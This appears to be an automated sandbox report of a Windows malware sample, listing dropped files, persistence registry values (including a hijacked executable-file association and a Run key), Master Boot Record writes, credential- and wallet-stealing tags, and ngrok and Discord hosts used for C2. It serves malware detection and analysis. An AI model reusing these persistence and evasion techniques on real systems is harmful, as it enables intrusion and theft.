N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\backdoor.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2946613613.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\248483651.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Windows\svchost.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE N/A
N/A N/A C:\Windows\SYSTEM32\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" C:\Users\Admin\AppData\Local\Temp\Files\m.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE N/A

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A 0.tcp.in.ngrok.io N/A N/A
N/A 0.tcp.in.ngrok.io N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\directx\websetup\dsetup.dll C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\SysWOW64\directx\websetup\SETD746.tmp C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\SysWOW64\DirectX\WebSetup C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\34B6AF881B9D738561FC099B83DF3A01 C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File created C:\Windows\system32\SubDir\Client.exe C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\34B6AF881B9D738561FC099B83DF3A01 C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
File created C:\Windows\SysWOW64\directx\websetup\SETD736.tmp C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe N/A
File created C:\Windows\SysWOW64\directx\websetup\SETD746.tmp C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\SysWOW64\directx\websetup\dsetup32.dll C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\SysWOW64\directx\websetup\SETD736.tmp C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmplayer.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GO664E~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOF5E2~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~3.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ExtExport.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\WINDOW~2\wab.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmlaunch.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{D87AE~1\WINDOW~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmpshare.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~4.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ExtExport.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOBD5D~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmlaunch.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MOZILL~1\UNINST~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{EF5AF~1\WINDOW~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\DISABL~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\setup_wm.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmprph.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmplayer.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~2\wab.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmprph.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~2.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~4.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{63880~1\WINDOW~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmpconfig.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmpshare.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe C:\Windows\svchost.com N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~2.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MID1AD~1.EXE C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File opened for modification C:\Windows\directx.sys C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\Logs\DirectX.log C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\axplong.job C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\axplong.job C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File opened for modification C:\Windows\directx.sys C:\Windows\svchost.com N/A
File created C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\Files\m.exe N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Embeds OpenSSL

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe
N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\wmic.exe N/A
